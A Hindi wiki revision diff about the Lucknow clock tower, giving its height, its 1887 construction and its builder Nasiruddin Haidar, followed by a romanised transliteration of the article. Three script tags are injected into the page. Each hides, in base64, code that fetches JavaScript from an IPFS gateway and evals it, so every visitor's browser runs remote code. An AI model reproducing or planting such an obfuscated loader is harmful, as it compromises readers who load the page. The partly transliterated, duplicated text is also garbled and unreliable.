Difference between revisions of "घंटाघर लखनऊ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*मोती मह उत्तर प्रदेश के लखनऊ शहर मे स्थित है। *लख...' के साथ नया पन्ना बनाया)
 
 
(4 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*मोती मह [[उत्तर प्रदेश]] के [[लखनऊ]] शहर मे स्थित है।  
+
{{सूचना बक्सा पर्यटन
 +
|चित्र=Clock-Tower-Lucknow.jpg
 +
|चित्र का नाम=घंटाघर
 +
|विवरण=घंटाघर [[भारत]] का सबसे ऊँचा घंटाघर है।
 +
|राज्य=[[उत्तर प्रदेश]]
 +
|केन्द्र शासित प्रदेश=
 +
|ज़िला=[[लखनऊ]]
 +
|निर्माता=[[नसीरुद्दीन हैदर]]
 +
|स्वामित्व=
 +
|प्रबंधक=
 +
|निर्माण काल=[[1887]] ई.
 +
|स्थापना=
 +
|भौगोलिक स्थिति=
 +
|मार्ग स्थिति=
 +
|मौसम=
 +
|तापमान=
 +
|प्रसिद्धि=
 +
|कब जाएँ=
 +
|कैसे पहुँचें=
 +
|हवाई अड्डा=
 +
|रेलवे स्टेशन=
 +
|बस अड्डा=
 +
|यातायात=
 +
|क्या देखें=
 +
|कहाँ ठहरें=
 +
|क्या खायें=
 +
|क्या ख़रीदें=
 +
|एस.टी.डी. कोड=
 +
|ए.टी.एम=
 +
|सावधानी=
 +
|मानचित्र लिंक=
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=इसे ब्रिटिश वास्तुकला के सबसे बेहतरीन नमूनों में माना जाता है।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''घंटाघर''' [[उत्तर प्रदेश]] के [[लखनऊ]] शहर में स्थित है।  
 
*लखनऊ का घंटाघर [[भारत]] का सबसे ऊँचा घंटाघर है।  
 
*लखनऊ का घंटाघर [[भारत]] का सबसे ऊँचा घंटाघर है।  
 
*यह घंटाघर [[1887]] ई. में बनवाया गया था।  
 
*यह घंटाघर [[1887]] ई. में बनवाया गया था।  
 
*इसे ब्रिटिश वास्तुकला के सबसे बेहतरीन नमूनों में माना जाता है।  
 
*इसे ब्रिटिश वास्तुकला के सबसे बेहतरीन नमूनों में माना जाता है।  
*221 फीट ऊँचे इस घंटाघर का निर्माण नवाब नसीरूद्दीन हैदर ने सर जार्ज कूपर के आगमन पर करवाया था। वे संयुक्त [[अवध]] प्रान्त के प्रथम लेफ्टिनेंट गवर्नर थे।
+
*221 फीट ऊँचे इस घंटाघर का निर्माण नवाब [[नसीरुद्दीन हैदर]] ने सर जार्ज कूपर के आगमन पर करवाया था।  
 +
* जार्ज कूपर संयुक्त [[अवध]] प्रान्त के प्रथम लेफ्टिनेंट गवर्नर थे।
 +
[[चित्र:Clock-Tower-Lucknow-2.jpg|thumb|250px|घंटाघर, [[लखनऊ]]|left]]
  
{{लेख प्रगति  
+
{{लेख प्रगति |आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध=}}
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1  
 
|माध्यमिक=  
 
|पूर्णता=  
 
|शोध=
 
}}
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{उत्तर प्रदेश के पर्यटन स्थल}}
 
{{उत्तर प्रदेश के पर्यटन स्थल}}

Latest revision as of 07:44, 21 October 2016

ghantaghar lakhanoo
vivaran ghantaghar bharat ka sabase ooancha ghantaghar hai.
rajy uttar pradesh
zila lakhanoo
nirmata nasiruddin haidar
nirman kal 1887 ee.
any janakari ise british vastukala ke sabase behatarin namoonoan mean mana jata hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

ghantaghar uttar pradesh ke lakhanoo shahar mean sthit hai.

  • lakhanoo ka ghantaghar bharat ka sabase ooancha ghantaghar hai.
  • yah ghantaghar 1887 ee. mean banavaya gaya tha.
  • ise british vastukala ke sabase behatarin namoonoan mean mana jata hai.
  • 221 phit ooanche is ghantaghar ka nirman navab nasiruddin haidar ne sar jarj koopar ke agaman par karavaya tha.
  • jarj koopar sanyukt avadh prant ke pratham lephtineant gavarnar the.

[[chitr:Clock-Tower-Lucknow-2.jpg|thumb|250px|ghantaghar, lakhanoo|left]]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh